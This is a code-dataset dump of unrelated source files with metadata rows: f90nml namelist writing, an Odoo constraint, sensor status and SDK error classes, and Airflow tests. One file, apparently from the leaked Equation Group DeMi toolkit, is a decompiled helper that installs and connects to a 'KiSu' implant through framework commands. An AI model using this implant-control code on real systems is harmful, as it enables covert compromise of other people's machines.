assignments, and the default behaviour is to omit these commas from the
output. Enabling this flag will append commas at the end of the line
for each variable assignment.
"""
return self._end_comma
@end_comma.setter
def end_comma(self, value):
"""Validate and set the comma termination flag."""
if not isinstance(value, bool):
raise TypeError('end_comma attribute must be a logical type.')
self._end_comma = value
@property
def false_repr(self):
"""Set the string representation of logical false values.
:type: ``str``
:default: ``'.false.'``
This is equivalent to the first element of ``logical_repr``.
"""
return self._logical_repr[0]
@false_repr.setter
def false_repr(self, value):
"""Validate and set the logical false representation."""
if isinstance(value, str):
if not (value.lower().startswith('f') or
value.lower().startswith('.f')):
raise ValueError("Logical false representation must start "
"with 'F' or '.F'.")
else:
self._logical_repr[0] = value
else:
raise TypeError('Logical false representation must be a string.')
@property
def float_format(self):
"""Set the namelist floating point format.
:type: ``str``
:default: ``''``
The property sets the format string for floating point numbers,
following the format expected by the Python ``format()`` function.
"""
return self._float_format
@float_format.setter
def float_format(self, value):
"""Validate and set the upper case flag."""
if isinstance(value, str):
# Duck-test the format string; raise ValueError on fail
'{0:{1}}'.format(1.23, value)
self._float_format = value
else:
raise TypeError('Floating point format code must be a string.')
@property
def indent(self):
r"""Set the whitespace indentation of namelist entries.
:type: ``int``, ``str``
:default: ``' '`` (four spaces)
This can be set to an integer, denoting the number of spaces, or to an
explicit whitespace character, such as a tab (``\t``).
"""
return self._indent
@indent.setter
def indent(self, value):
"""Validate and set the indent width."""
# Explicit indent setting
if isinstance(value, str):
if value.isspace() or len(value) == 0:
self._indent = value
else:
raise ValueError('String indentation can only contain '
'whitespace.')
# Set indent width
elif isinstance(value, int):
if value >= 0:
self._indent = value * ' '
else:
raise ValueError('Indentation spacing must be nonnegative.')
else:
raise TypeError('Indentation must be specified by string or space '
'width.')
@property
def index_spacing(self):
"""Apply a space between indexes of multidimensional vectors.
:type: ``bool``
:default: ``False``
"""
return self._index_spacing
@index_spacing.setter
def index_spacing(self, value):
"""Validate and set the index_spacing flag."""
if not isinstance(value, bool):
raise TypeError('index_spacing attribute must be a logical type.')
self._index_spacing = value
# NOTE: This presumes that bools and ints are identical as dict keys
@property
def logical_repr(self):
"""Set the string representation of logical values.
:type: ``dict``
:default: ``{False: '.false.', True: '.true.'}``
There are multiple valid representations of True and False values in
Fortran. This property sets the preferred representation in the
namelist output.
The properties ``true_repr`` and ``false_repr`` are also provided as
interfaces to the elements of ``logical_repr``.
"""
return self._logical_repr
@logical_repr.setter
def logical_repr(self, value):
"""Set the string representation of logical values."""
if not any(isinstance(value, t) for t in (list, tuple)):
raise TypeError("Logical representation must be a tuple with "
"a valid true and false value.")
if not len(value) == 2:
raise ValueError("List must contain two values.")
self.false_repr = value[0]
self.true_repr = value[1]
@property
def repeat_counter(self):
"""Return whether the namelist uses repeat counters for arrays.
If True, then arrays with repeated values will use repeat tokens. For
example, the array ``[1, 2, 2, 2]`` will be written as ``1, 3*2``.
:type: ``bool``
:default: ``False``
"""
return self._repeat_counter
@repeat_counter.setter
def repeat_counter(self, value):
"""Set whether array output should be done in repeat form."""
if isinstance(value, bool):
self._repeat_counter = value
else:
raise TypeError(r"repeat must be of type ``bool``")
@property
def split_strings(self):
"""Split strings at the ``column_width`` over multiple lines.
:type: ``bool``
:default: ``False``
"""
return self._split_strings
@split_strings.setter
def split_strings(self, value):
"""Validate and set the split_strings flag."""
if not isinstance(value, bool):
raise TypeError('split_strings attribute must be a logical type.')
self._split_strings = value
@property
def start_index(self):
"""Set the starting index for each vector in the namelist.
:type: ``dict``
:default: ``{}``
``start_index`` is stored as a dict which contains the starting index
for each vector saved in the namelist. For the namelist ``vec.nml``
shown below,
.. code-block:: fortran
&vec_nml
a = 1, 2, 3
b(0:2) = 0, 1, 2
c(3:5) = 3, 4, 5
d(:,:) = 1, 2, 3, 4
/
the ``start_index`` contents are
.. code:: python
>>> import f90nml
>>> nml = f90nml.read('vec.nml')
>>> nml['vec_nml'].start_index
{'b': [0], 'c': [3], 'd': [None, None]}
The starting index of ``a`` is absent from ``start_index``, since its
starting index is unknown and its values cannot be assigned without
referring to the corresponding Fortran source.
"""
return self._start_index
@start_index.setter
def start_index(self, value):
"""Validate and set the vector start index."""
# TODO: Validate contents? (May want to set before adding the data.)
if not isinstance(value, dict):
raise TypeError('start_index attribute must be a dict.')
self._start_index = value
@property
def true_repr(self):
"""Set the string representation of logical true values.
:type: ``str``
:default: ``.true.``
This is equivalent to the second element of ``logical_repr``.
"""
return self._logical_repr[1]
@true_repr.setter
def true_repr(self, value):
"""Validate and set the logical true representation."""
if isinstance(value, str):
if not (value.lower().startswith('t') or
value.lower().startswith('.t')):
raise ValueError("Logical true representation must start with "
"'T' or '.T'.")
else:
self._logical_repr[1] = value
else:
raise TypeError('Logical true representation must be a string.')
@property
def uppercase(self):
"""Print group and variable names in uppercase.
:type: ``bool``
:default: ``False``
This is equivalent to the second element of ``logical_repr``.
"""
return self._uppercase
@uppercase.setter
def uppercase(self, value):
"""Validate and set the uppercase flag."""
if not isinstance(value, bool):
raise TypeError('uppercase attribute must be a logical type.')
self._uppercase = value
def write(self, nml_path, force=False, sort=False):
"""Write Namelist to a Fortran 90 namelist file.
>>> nml = f90nml.read('input.nml')
>>> nml.write('out.nml')
"""
nml_is_file = hasattr(nml_path, 'read')
if not force and not nml_is_file and os.path.isfile(nml_path):
raise IOError('File {0} already exists.'.format(nml_path))
nml_file = nml_path if nml_is_file else open(nml_path, 'w')
try:
self._writestream(nml_file, sort)
finally:
if not nml_is_file:
nml_file.close()
def patch(self, nml_patch):
"""Update the namelist from another partial or full namelist.
This is different from the intrinsic `update()` method, which replaces
a namelist section. Rather, it updates the values within a section.
"""
for sec in nml_patch:
if sec not in self:
self[sec] = Namelist()
self[sec].update(nml_patch[sec])
def add_cogroup(self, key, val):
"""Append a duplicate group to the Namelist as a new group."""
# TODO: What to do if it's a new group? Add normally?
lkey = key.lower()
assert lkey in self or lkey in self._cogroups
grps = self[lkey]
# Set up the cogroup if it does not yet exist
if isinstance(grps, Namelist):
# NOTE: We re-use the key to preserve the original order.
self._cogroups.append(lkey)
grps = [grps]
# Generate the cogroup label and add to the Namelist
# NOTE: In order to preserve ordering, we cannot reuse a key which may
# have been removed. So we always generate a new key based on the
# largest index. If no key is present, initialize with 1.
# Gather the list of existing IDs
hdr = '_grp_{0}_'.format(key)
idx = [int(k.split(hdr)[1]) for k in self if k.startswith(hdr)]
try:
cogrp_id = 1 + max(idx)
except ValueError:
cogrp_id = 1
cogrp_key = '_'.join(['_grp', lkey, str(cogrp_id)])
self[cogrp_key] = val
def groups(self):
"""Return an iterator that spans values with group and variable names.
Elements of the iterator consist of a tuple containing two values. The
first is internal tuple containing the current namelist group and its
variable name. The second element of the returned tuple is the value
associated with the current group and variable.
"""
for key, value in self.items():
for inner_key, inner_value in value.items():
yield (key, inner_key), inner_value
def _writestream(self, nml_file, sort=False):
"""Output Namelist to a streamable file object."""
# Reset newline flag
self._newline = False
if sort:
sel = Namelist(sorted(self.items(), key=lambda t: t[0]))
else:
sel = self
for grp_name, grp_vars in sel.items():
# Check for repeated namelist records (saved as lists)
if isinstance(grp_vars, list):
for g_vars in grp_vars:
self._write_nmlgrp(grp_name, g_vars, nml_file, sort)
else:
self._write_nmlgrp(grp_name, grp_vars, nml_file, sort)
def _write_nmlgrp(self, grp_name, grp_vars, nml_file, sort=False):
"""Write namelist group to target file."""
if self._newline:
print(file=nml_file)
self._newline = True
# Strip metadata label for repeat groups
if grp_name.startswith('_grp_'):
grp_name = grp_name[5:].rsplit('_', 1)[0]
if self.uppercase:
grp_name = grp_name.upper()
if sort:
grp_vars = Namelist(sorted(grp_vars.items(), key=lambda t: t[0]))
print('&{0}'.format(grp_name), file=nml_file)
for v_name, v_val in grp_vars.items():
v_start = grp_vars.start_index.get(v_name, None)
for v_str in self._var_strings(v_name, v_val, v_start=v_start):
print(v_str, file=nml_file)
print('/', file=nml_file)
def _var_strings(self, v_name, v_values, v_idx=None, v_start=None):
"""Convert namelist variable to list of fixed-width strings."""
if self.uppercase:
v_name = v_name.upper()
var_strs = []
# Parse a multidimensional array
if is_nullable_list(v_values, list):
if not v_idx:
v_idx = []
i_s = v_start[::-1][len(v_idx)] if v_start else None
# FIXME: We incorrectly assume 1-based indexing if it is
# unspecified. This is necessary because our output method always
# separates the outer axes to one per line. But we cannot do this
# if we don't know the first index (which we are no longer assuming
# to be 1-based elsewhere). Unfortunately, the solution needs a
# rethink of multidimensional output.
# NOTE: Fixing this would also clean up the output of todict(),
# which is now incorrectly documenting unspecified indices as 1.
# For now, we will assume 1-based indexing here, just to keep
# things working smoothly.
if i_s is None:
i_s = 1
for idx, val in enumerate(v_values, start=i_s):
v_idx_new = v_idx + [idx]
v_strs = self._var_strings(v_name, val, v_idx=v_idx_new,
v_start=v_start)
var_strs.extend(v_strs)
# Parse derived type contents
elif isinstance(v_values, Namelist):
for f_name, f_vals in v_values.items():
v_title = '%'.join([v_name, f_name])
v_start_new = v_values.start_index.get(f_name, None)
v_strs = self._var_strings(v_title, f_vals,
v_start=v_start_new)
var_strs.extend(v_strs)
# Parse an array of derived types
elif is_nullable_list(v_values, Namelist):
if not v_idx:
v_idx = []
i_s = v_start[::-1][len(v_idx)] if v_start else 1
for idx, val in enumerate(v_values, start=i_s):
# Skip any empty elements in a list of derived types
if val is None:
continue
v_title = v_name + '({0})'.format(idx)
v_strs = self._var_strings(v_title, val)
var_strs.extend(v_strs)
else:
use_default_start_index = False
if not isinstance(v_values, list):
v_values = [v_values]
use_default_start_index = False
else:
use_default_start_index = self.default_start_index is not None
# Print the index range
# TODO: Include a check for len(v_values) to determine if vector
if v_idx or v_start or use_default_start_index:
v_idx_repr = '('
if v_start or use_default_start_index:
if v_start:
i_s = v_start[0]
else:
i_s = self.default_start_index
if i_s is None:
v_idx_repr += ':'
else:
i_e = i_s + len(v_values) - 1
if i_s == i_e:
v_idx_repr += '{0}'.format(i_s)
else:
v_idx_repr += '{0}:{1}'.format(i_s, i_e)
else:
v_idx_repr += ':'
if v_idx:
idx_delim = ', ' if self._index_spacing else ','
v_idx_repr += idx_delim
v_idx_repr += idx_delim.join(str(i) for i in v_idx[::-1])
v_idx_repr += ')'
else:
v_idx_repr = ''
# Split output across multiple lines (if necessary)
v_header = self.indent + v_name + v_idx_repr + ' = '
val_strs = []
val_line = v_header
if self._repeat_counter:
v_values = list(
self.RepeatValue(len(list(x)), val)
for val, x in itertools.groupby(v_values)
)
for i_val, v_val in enumerate(v_values):
# Increase column width if the header exceeds this value
if len(v_header) >= self.column_width:
column_width = len(v_header) + 1
else:
column_width = self.column_width
if len(val_line) < column_width:
# NOTE: We allow non-strings to extend past the column
# limit, but strings will be split as needed.
v_str = self._f90repr(v_val)
# Set a comma placeholder if needed
if i_val < len(v_values) - 1 or self.end_comma:
v_comma = ', '
else:
v_comma = ''
if self.split_strings and isinstance(v_val, str):
idx = column_width - len(val_line + v_comma.rstrip())
# Split the line along idx until we either exceed the
# column width, or read the end of the string.
v_l, v_r = v_str[:idx], v_str[idx:]
if v_r:
# Check if string can fit on the next line
new_val_line = (
' ' * len(v_header) + v_str + v_comma
)
if len(new_val_line.rstrip()) <= column_width:
val_strs.append(val_line)
val_line = ' ' * len(v_header)
else:
# Split string across multiple lines
while v_r:
val_line += v_l
val_strs.append(val_line)
val_line = ''
idx = column_width - len(v_comma.rstrip())
v_l, v_r = v_r[:idx], v_r[idx:]
v_str = v_l
val_line += v_str + v_comma
# Line break
if len(val_line) >= column_width:
# Append current line to list of lines
val_strs.append(val_line.rstrip())
# Start new line with space corresponding to header
val_line = ' ' * len(v_header)
# Append any remaining values
if val_line and not val_line.isspace():
val_strs.append(val_line.rstrip())
# Final null values must always precede a comma
if val_strs and v_values[-1] is None:
# NOTE: val_strs has been rstrip-ed so lead with a space
val_strs[-1] += ' ,'
# Complete the set of values
if val_strs:
var_strs.extend(val_strs)
return var_strs
def todict(self, complex_tuple=False):
"""Return a dict equivalent to the namelist.
Since Fortran variables and names cannot start with the ``_``
character, any keys starting with this token denote metadata, such as
starting index.
The ``complex_tuple`` flag is used to convert complex data into an
equivalent 2-tuple, with metadata stored to flag the variable as
complex. This is primarily used to facilitate the storage of the
namelist into an equivalent format which does not support complex
numbers, such as JSON or YAML.
"""
# TODO: Preserve ordering
nmldict = OrderedDict(self)
# Search for namelists within the namelist
# TODO: Move repeated stuff to new functions
for key, value in self.items():
if isinstance(value, Namelist):
nml = copy.deepcopy(value)
nmldict[key] = nml.todict(complex_tuple)
elif isinstance(value, complex) and complex_tuple:
nmldict[key] = [value.real, value.imag]
try:
nmldict['_complex'].append(key)
except KeyError:
nmldict['_complex'] = [key]
elif isinstance(value, list):
complex_list = False
for idx, entry in enumerate(value):
if isinstance(entry, Namelist):
nml = copy.deepcopy(entry)
nmldict[key][idx] = nml.todict(complex_tuple)
elif isinstance(entry, complex) and complex_tuple:
nmldict[key][idx] = [entry.real, entry.imag]
complex_list = True
if complex_list:
try:
nmldict['_complex'].append(key)
except KeyError:
nmldict['_complex'] = [key]
# Append the start index if present
if self.start_index:
nmldict['_start_index'] = self.start_index
return nmldict
def _f90repr(self, value):
"""Convert primitive Python types to equivalent Fortran strings."""
if isinstance(value, self.RepeatValue):
return self._f90repeat(value)
elif isinstance(value, bool):
return self._f90bool(value)
elif isinstance(value, numbers.Integral):
return self._f90int(value)
elif isinstance(value, numbers.Real):
return self._f90float(value)
elif isinstance(value, numbers.Complex):
return self._f90complex(value)
elif isinstance(value, basestring):
return self._f90str(value)
elif value is None:
return ''
else:
raise ValueError('Type {0} of {1} cannot be converted to a Fortran'
' type.'.format(type(value), value))
def _f90repeat(self, value):
"""Return a Fortran 90 representation of a repeated value."""
if value.repeats == 1:
return self._f90repr(value.value)
else:
return "{0}*{1}".format(value.repeats,
self._f90repr(value.value))
def _f90bool(self, value):
"""Return a Fortran 90 representation of a logical value."""
return self.logical_repr[value]
def _f90int(self, value):
"""Return a Fortran 90 representation of an integer."""
return str(value)
def _f90float(self, value):
"""Return a Fortran 90 representation of a floating point number."""
return '{0:{fmt}}'.format(value, fmt=self.float_format)
def _f90complex(self, value):
"""Return a Fortran 90 representation of a complex number."""
return '({0:{fmt}}, {1:{fmt}})'.format(value.real, value.imag,
fmt=self.float_format)
def _f90str(self, value):
"""Return a Fortran 90 representation of a string."""
# Replace Python quote escape sequence with Fortran
result = repr(str(value)).replace("\\'", "''").replace('\\"', '""')
# Un-escape the Python backslash escape sequence
result = result.replace('\\\\', '\\')
return result
# TODO: Move to separate file? What about ref to Namelist?
class Cogroup(list):
"""List of Namelist groups which share a common key.
Although Namelists are organized as associative arrays, access is
typically through a serial I/O data stream. One consequence is that a
namelist may contain multiple keys for different values.
This object returns a list of namelist groups which use the same key.
Internal keys correspond to the original ordering in the namelist.
When an element of the list is updated, the corresponding namelist element
is also updated.
"""
def __init__(self, nml, key, *args, **kwds):
"""Generate list of Namelist cogroups linked to parent namelist."""
self.nml = nml
self.key = key
grps = [OrderedDict.__getitem__(self.nml, k) for k in self.keys]
super(Cogroup, self).__init__(grps, **kwds)
def __setitem__(self, index, value):
"""Update cogroup list and parent namelist."""
key = self.keys[index]
OrderedDict.__setitem__(self.nml, key, value)
def __delitem__(self, index):
gkey = self.keys[index]
OrderedDict.__delitem__(self.nml, gkey)
super(Cogroup, self).__delitem__(index)
# Remove the cogroup status if keys are depleted
if len(self) == 0:
self.nml._cogroups.remove(self.key)
@property
def keys(self):
"""Return the namelist keys in the cogroup."""
cogrp_keys = [
k for k in self.nml
if k.startswith('_grp_{}'.format(self.key))
or k == self.key
]
return cogrp_keys
def is_nullable_list(val, vtype):
"""Return True if list contains either values of type `vtype` or None."""
return (isinstance(val, list) and
any(isinstance(v, vtype) for v in val) and
all((isinstance(v, vtype) or v is None) for v in val))
| apache-2.0 | 6,405,817,952,973,433,000 | 34.808732 | 79 | 0.547724 | false | 4.373794 | false | false | false |
brain-tec/partner-contact | partner_ref_unique/models/res_partner.py | 2 | 1192 | # Copyright 2016 Antonio Espinosa
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo import _, api, models
from odoo.exceptions import ValidationError
class ResPartner(models.Model):
_inherit = "res.partner"
@api.multi
@api.constrains('ref', 'is_company', 'company_id')
def _check_ref(self):
for partner in self:
mode = partner.company_id.partner_ref_unique
if (partner.ref and (
mode == 'all' or
(mode == 'companies' and partner.is_company))):
domain = [
('id', '!=', partner.id),
('ref', '=', partner.ref),
]
if mode == 'companies':
domain.append(('is_company', '=', True))
other = self.search(domain)
# active_test is False when called from
# base.partner.merge.automatic.wizard
if other and self.env.context.get("active_test", True):
raise ValidationError(
_("This reference is equal to partner '%s'") %
other[0].display_name)
| agpl-3.0 | 5,771,191,152,878,194,000 | 36.25 | 71 | 0.510067 | false | 4.350365 | false | false | false |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/DeMi/PyScripts/Lib/demi/__init__.py | 1 | 3580 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
import demi.windows
import demi.registry
import dsz.env
import re
ConnectedEnv = '_DEMI_KISU_COMMS_ESTABLISHED'
KiSuEnabledEnv = '_DEMI_KISU_ENABLED'
def IsConnected():
id = ConnectedId()
return id != None
def ConnectedId():
curId = None
try:
curId = int(dsz.env.Get(ConnectedEnv), 16)
if curId == 0:
return
return curId
except:
return
return
def UseKiSu():
if not IsConnected():
return False
try:
state = dsz.env.Get(KiSuEnabledEnv)
if state.lower() in ('true', 'enabled', 'on', '1', 'go', 'use'):
return True
except:
pass
return False
def EnableKiSu():
dsz.env.Set(KiSuEnabledEnv, 'on')
return True
def DisableKiSu():
dsz.env.Set(KiSuEnabledEnv, 'off')
return True
def IsKisuAvailable(instance=None, type=None):
return dsz.cmd.Run('available -command kisu_install')
def InstallKiSu(instance=None, type=None):
dsz.ui.Echo('entered')
instanceId = '-type PC'
if instance != None:
instanceId = '-instance 0x%08x' % instance
if type != None:
instanceId = '-type %s' % type
return dsz.cmd.Run('kisu_install %s' % instanceId)
def ConnectKiSu(instance=None, type=None):
instanceId = '-type PC'
if instance != None:
instanceId = '-instance %s' % instance
if type != None:
instanceId = '-type %s' % type
return dsz.cmd.Run('kisu_connect %s' % instanceId)
def DisconnectKiSu():
return dsz.cmd.Run('kisu_disconnect')
def EnsureConnected(ask=True):
if demi.IsConnected():
return True
if not ask:
dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.ERROR)
return False
dsz.ui.Echo('* Not currently connected to a KISU instance', dsz.WARNING)
try:
str = dsz.ui.GetString('What KISU would you like to connect to?', 'pc')
except:
return False
key = '-type'
try:
if re.match('^([0-9]+)|(0[xX][0-9a-fA-F]{1,8})$', str):
key = '-instance'
except:
pass
dsz.ui.Echo('Loading KISU tool')
if not dsz.cmd.Run('available -command kisu_connect -load'):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('* Unable to load KISU tool', dsz.ERROR)
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
dsz.ui.Echo('Attempting to connect to KISU %s' % str)
if not dsz.cmd.Run('kisu_connect %s %s' % (key, str)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('* Unable to connect to a KISU instance', dsz.ERROR)
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
def TranslateIdToName(id):
Unknown = 'Unknown'
if id == None:
return Unknown
else:
try:
import demi.mcf.kisu.ids
for name in demi.mcf.kisu.ids.nameTable:
if demi.mcf.kisu.ids.nameTable[name] == id:
return name
except:
pass
return Unknown
def TranslateNameToId(Name):
Unknown = 0
if Name == None:
return Unknown
else:
try:
import demi.mcf.kisu.ids
for kisuName in demi.mcf.kisu.ids.nameTable:
if kisuName.lower() == Name.lower():
return demi.mcf.kisu.ids.nameTable[kisuName]
except:
pass
return Unknown | unlicense | -6,117,307,922,654,907,000 | 23.696552 | 79 | 0.586313 | false | 3.199285 | false | false | false |
AronTrask/Kaspbot | libkasbot/ExcelBot/utils.py | 1 | 1672 | # Consider if this is the correct location for this element
def test_valid_coord(coord):
"""
Fill in
"""
assert type(coord) is tuple, "{} is not a tuple (coord)".format(coord)
assert type(coord[0]) is int, "{} is not an int (coord 0)".format(coord[0])
assert type(coord[1]) is int, "{} is not an int (coord 1)".format(coord[1])
assert coord[0] > -1, "{} must be greater than zero (coord 0)".format(coord[0])
assert coord[1] > -1, "{} must be greater than zero (coord 1)".format(coord[1])
return True
# This can probably be consolidated into an error class
def coord_range(coord0, coord1):
"""
Returns a list of coordinates for a table (by row) between two coordinate points of the form (0,0) where the first coordinate value is less than the second in both axes
@parameter - coord0, type = tuple
@parameter - coord1, type = tuple
@return, type = list of tuples or error
@dependencies, test_valid_coord (lf) which returns true or raises an assertion error
"""
# _Testing
if test_valid_coord(coord0) and test_valid_coord(coord1):
pass
else:
raise TypeError("Rewrite coordinates") # consider if type error is the best error for this
# _Main
ret_list = []
if coord0[0] <= coord1[0] and coord0[1] <= coord1[1]:
init0 = coord0[0]
init1 = coord0[1]
while init0 < coord1[0] + 1:
while init1 < coord1[1] + 1:
ret_list.append((init0,init1))
init1 += 1
init0 += 1
init1 = coord0[1]
else:
raise TypeError("Specify a valid start and end coordinate")
return ret_list
| mit | -5,784,959,346,883,634,000 | 35.347826 | 172 | 0.617823 | false | 3.650655 | false | false | false |
south-coast-science/scs_dfe_eng | src/scs_dfe/particulate/opc_n3/opc_status.py | 1 | 3264 | """
Created on 16 Nov 2018
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from collections import OrderedDict
from scs_core.data.json import JSONable
# --------------------------------------------------------------------------------------------------------------------
class OPCStatus(JSONable):
"""
classdocs
"""
CHARS = 6
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct(cls, chars):
if len(chars) != cls.CHARS:
raise ValueError(chars)
fan_on = chars[0]
laser_dac_on = chars[1]
fan_dac_value = chars[2]
laser_dac_value = chars[3]
laser_switch = chars[4]
gain_toggle = chars[5]
return OPCStatus(fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, fan_on, laser_dac_on, fan_dac_value, laser_dac_value, laser_switch, gain_toggle):
"""
Constructor
"""
self.__fan_on = int(fan_on)
self.__laser_dac_on = int(laser_dac_on)
self.__fan_dac_value = int(fan_dac_value)
self.__laser_dac_value = int(laser_dac_value)
self.__laser_switch = int(laser_switch)
self.__gain_toggle = int(gain_toggle)
# ----------------------------------------------------------------------------------------------------------------
def fan_is_on(self):
return self.fan_on & 0x01
def laser_is_on(self):
return self.laser_switch & 0x01
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['fan-on'] = self.fan_on
jdict['laser-dac-on'] = self.laser_dac_on
jdict['fan-dac-value'] = self.fan_dac_value
jdict['laser-dac-value'] = self.laser_dac_value
jdict['laser-switch'] = self.laser_switch
jdict['gain-toggle'] = self.gain_toggle
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def fan_on(self):
return self.__fan_on
@property
def laser_dac_on(self):
return self.__laser_dac_on
@property
def fan_dac_value(self):
return self.__fan_dac_value
@property
def laser_dac_value(self):
return self.__laser_dac_value
@property
def laser_switch(self):
return self.__laser_switch
@property
def gain_toggle(self):
return self.__gain_toggle
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "OPCStatus:{fan_on:0x%02x, laser_dac_on:0x%02x, fan_dac_value:0x%02x, laser_dac_value:0x%02x, " \
"laser_switch:0x%02x, gain_toggle:0x%02x}" % \
(self.fan_on, self.laser_dac_on, self.fan_dac_value, self.laser_dac_value,
self.laser_switch, self.gain_toggle)
| mit | 409,894,917,096,973,500 | 27.382609 | 118 | 0.434743 | false | 4 | false | false | false |
predikto/python-sdk | predikto/errors.py | 1 | 1828 | # Copyright 2014-2015 Predikto, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
class RequestError(Exception):
def __init__(self, response, content=None, message=None):
self.response = response
self.content = content
self.message = message
def __str__(self):
message = "ERROR!"
if hasattr(self.response, 'status_code'):
message += " HTTP Status: %s." % (self.response.status_code)
if hasattr(self.response, 'message'):
message += " Message: %s." % (self.response.message)
if self.content is not None:
message += " Error: " + str(self.content)
return message
class MissingConfig(Exception):
pass
class ClientError(RequestError):
"""
Base
"""
pass
class InvalidResource(ClientError):
"""
400
"""
pass
class Unauthorized(ClientError):
"""
401
"""
pass
class Forbidden(ClientError):
"""
403
"""
pass
class ResourceNotFound(ClientError):
"""
404
"""
pass
class EntityTooLarge(ClientError):
"""
413
"""
pass
class ServerError(RequestError):
"""
500
"""
pass
class MethodNotAllowed(ClientError):
"""
405
"""
def allowed_methods(self):
return self.response['Allow']
| apache-2.0 | 675,187,820,182,811,300 | 18.869565 | 75 | 0.626368 | false | 4.145125 | false | false | false |
artwr/airflow | tests/utils/test_helpers.py | 3 | 9730 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import multiprocessing
import os
import signal
import time
import unittest
from datetime import datetime
import psutil
import six
from airflow import DAG
from airflow.utils import helpers
from airflow.models import TaskInstance
from airflow.operators.dummy_operator import DummyOperator
class TestHelpers(unittest.TestCase):
@staticmethod
def _ignores_sigterm(child_pid, child_setup_done):
def signal_handler(signum, frame):
pass
signal.signal(signal.SIGTERM, signal_handler)
child_pid.value = os.getpid()
child_setup_done.release()
while True:
time.sleep(1)
@staticmethod
def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done):
def signal_handler(signum, frame):
pass
os.setsid()
signal.signal(signal.SIGTERM, signal_handler)
child_setup_done = multiprocessing.Semaphore(0)
child = multiprocessing.Process(target=TestHelpers._ignores_sigterm,
args=[child_pid, child_setup_done])
child.start()
child_setup_done.acquire(timeout=5.0)
parent_pid.value = os.getpid()
setup_done.release()
while True:
time.sleep(1)
def test_render_log_filename(self):
try_number = 1
dag_id = 'test_render_log_filename_dag'
task_id = 'test_render_log_filename_task'
execution_date = datetime(2016, 1, 1)
dag = DAG(dag_id, start_date=execution_date)
task = DummyOperator(task_id=task_id, dag=dag)
ti = TaskInstance(task=task, execution_date=execution_date)
filename_template = "{{ ti.dag_id }}/{{ ti.task_id }}/{{ ts }}/{{ try_number }}.log"
ts = ti.get_template_context()['ts']
expected_filename = "{dag_id}/{task_id}/{ts}/{try_number}.log".format(dag_id=dag_id,
task_id=task_id,
ts=ts,
try_number=try_number)
rendered_filename = helpers.render_log_filename(ti, try_number, filename_template)
self.assertEqual(rendered_filename, expected_filename)
def test_reap_process_group(self):
"""
Spin up a process that can't be killed by SIGTERM and make sure
it gets killed anyway.
"""
parent_setup_done = multiprocessing.Semaphore(0)
parent_pid = multiprocessing.Value('i', 0)
child_pid = multiprocessing.Value('i', 0)
args = [parent_pid, child_pid, parent_setup_done]
parent = multiprocessing.Process(target=TestHelpers._parent_of_ignores_sigterm,
args=args)
try:
parent.start()
self.assertTrue(parent_setup_done.acquire(timeout=5.0))
self.assertTrue(psutil.pid_exists(parent_pid.value))
self.assertTrue(psutil.pid_exists(child_pid.value))
helpers.reap_process_group(parent_pid.value, logging.getLogger(),
timeout=1)
self.assertFalse(psutil.pid_exists(parent_pid.value))
self.assertFalse(psutil.pid_exists(child_pid.value))
finally:
try:
os.kill(parent_pid.value, signal.SIGKILL) # terminate doesnt work here
os.kill(child_pid.value, signal.SIGKILL) # terminate doesnt work here
except OSError:
pass
def test_chunks(self):
with self.assertRaises(ValueError):
[i for i in helpers.chunks([1, 2, 3], 0)]
with self.assertRaises(ValueError):
[i for i in helpers.chunks([1, 2, 3], -3)]
self.assertEqual([i for i in helpers.chunks([], 5)], [])
self.assertEqual([i for i in helpers.chunks([1], 1)], [[1]])
self.assertEqual([i for i in helpers.chunks([1, 2, 3], 2)],
[[1, 2], [3]])
def test_reduce_in_chunks(self):
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y],
[1, 2, 3, 4, 5],
[]),
[[1, 2, 3, 4, 5]])
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + [y],
[1, 2, 3, 4, 5],
[],
2),
[[1, 2], [3, 4], [5]])
self.assertEqual(helpers.reduce_in_chunks(lambda x, y: x + y[0] * y[1],
[1, 2, 3, 4],
0,
2),
14)
def test_is_in(self):
obj = ["list", "object"]
# Check for existence of a list object within a list
self.assertTrue(
helpers.is_in(obj, [obj])
)
# Check that an empty list returns false
self.assertFalse(
helpers.is_in(obj, [])
)
# Check to ensure it handles None types
self.assertFalse(
helpers.is_in(None, [obj])
)
# Check to ensure true will be returned of multiple objects exist
self.assertTrue(
helpers.is_in(obj, [obj, obj])
)
def test_is_container(self):
self.assertFalse(helpers.is_container("a string is not a container"))
